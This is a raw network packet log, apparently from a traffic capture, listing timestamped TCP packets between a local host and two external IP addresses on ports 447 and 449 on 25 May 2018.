Mai 25, 2018 16:09:18.711879969 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:18.713084936 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:18.713109970 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:19.249706030 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:19.281433105 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:19.281487942 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:19.695291996 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:19.899019003 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:19.899216890 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:20.101613998 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:20.101646900 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.768655062 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.768692017 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.768704891 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.768918991 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:20.769936085 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.769958973 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.770111084 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:20.771370888 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.771389961 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.771527052 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:20.830389977 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.830425024 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.830435038 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.830579996 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:20.833062887 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.913849115 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.913878918 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:20.914086103 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:20.914145947 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.071481943 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.071494102 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.073601961 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.073620081 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.073632956 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.073645115 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.075508118 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.075588942 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.075608969 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.075855970 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.093378067 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.093410015 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.093417883 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.093643904 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.096245050 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.115487099 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.129726887 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.129750967 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.129760027 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.129770994 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.129779100 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.129904985 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.129940033 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.132368088 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.132386923 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.132522106 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.132560968 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.212887049 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.212913036 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.212927103 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.212937117 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213112116 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213129997 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213141918 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213160992 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.213218927 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213231087 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213254929 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213268995 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213282108 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213434935 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.213479042 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213499069 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213516951 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213536024 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.213553905 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.214787960 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.215641975 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.215665102 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.215673923 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.215810061 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.215837002 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.219707012 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.219731092 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.219949007 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.219980001 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.225126982 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.225148916 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.225159883 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.225167990 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.225176096 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.225295067 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.225321054 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.226191998 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.226210117 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.226221085 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.226317883 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.226341009 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.227881908 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.228166103 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:21.228214025 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.447026014 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:09:21.447185040 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:09:56.351033926 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:56.351075888 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:56.917769909 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:56.926645994 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:56.926676989 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:57.699757099 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:09:57.903626919 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:59.353209972 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:09:59.353246927 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:10:00.015077114 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:10:00.016751051 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:10:00.016777992 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:10:00.018259048 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:10:00.018286943 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:10:00.018416882 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:10:00.018434048 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:10:00.019093037 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:10:00.019115925 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:10:01.328716040 MESZ	449	49195	92.55.251.211	192.168.1.16
Mai 25, 2018 16:10:01.332819939 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:01.332855940 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:01.532269955 MESZ	49195	449	192.168.1.16	92.55.251.211
Mai 25, 2018 16:10:02.010622978 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.010648966 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.010654926 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.010864973 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.013518095 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.013539076 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.013545036 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.013695002 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.064872980 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.064903975 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.064966917 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.073548079 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.073579073 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.073594093 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.073651075 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.163827896 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.163851976 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.163857937 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.163866043 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.163872004 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.163940907 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.163961887 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.164200068 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.164254904 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.164727926 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.165769100 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.165802956 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.215406895 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.215440035 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.215447903 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.215523005 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.215559006 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.218322992 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.218352079 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.220171928 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.220205069 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.229671001 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.229697943 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.231197119 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.231228113 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.316768885 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.316796064 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.316816092 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.316828966 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.316838026 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.316930056 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319175959 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.319202900 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319212914 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319225073 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319230080 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319240093 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319246054 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319252968 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319540024 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.319561958 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319571972 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319577932 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319582939 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319590092 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319595098 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319602013 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.319794893 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.319813013 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362601042 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362632990 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362648010 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362656116 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362668037 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362719059 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.362750053 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362765074 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362781048 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362792969 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362799883 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.362843990 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.362864971 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.363080025 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.365401983 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.365427971 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.365437031 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.365489960 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.376346111 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.376372099 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.376394987 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.376418114 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.376435041 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.376627922 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.376650095 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.376847029 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.376930952 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.376948118 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.379034996 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.379132032 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.379160881 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.456681013 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.456731081 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.456778049 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.456799984 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.456907034 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.456949949 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.457070112 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.457103014 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.457201004 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.457231045 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.457788944 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.457823038 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.457848072 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.457947016 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.457979918 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.467581987 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.467603922 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.467637062 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.467655897 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.467672110 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.467684984 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.467719078 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.467767000 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.467782021 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.467905045 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.467936993 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.468801975 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.468822002 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.468832970 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.468961954 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.469007969 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.500487089 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.500524044 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.500559092 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.501202106 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.501240015 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.511571884 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.511604071 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.511625051 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.511656046 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.511674881 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.511764050 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.511809111 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512006044 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512029886 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512073994 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512094975 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512094975 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.512120008 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512146950 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512269974 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512281895 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.512291908 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512314081 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512485981 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512507915 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512530088 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512532949 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.512547970 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512569904 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512662888 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.512707949 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512729883 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512747049 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.512780905 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.513283014 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.514030933 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.514125109 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.514153004 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.564704895 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.564722061 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.564729929 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.564753056 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.564776897 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.564826965 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.564851046 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.564867973 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.564884901 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.564953089 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.564971924 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.565665960 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.565676928 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.565684080 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.565777063 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.565799952 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.567508936 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.567522049 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.567641020 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.567665100 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.587852955 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.587871075 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.587878942 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.587883949 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.587889910 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.588048935 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.588079929 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.590595961 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.590620995 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.590641022 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.590692043 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.590709925 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.590805054 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.608793974 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.608836889 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.608856916 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.608958006 MESZ	49197	447	192.168.1.16	82.202.221.37
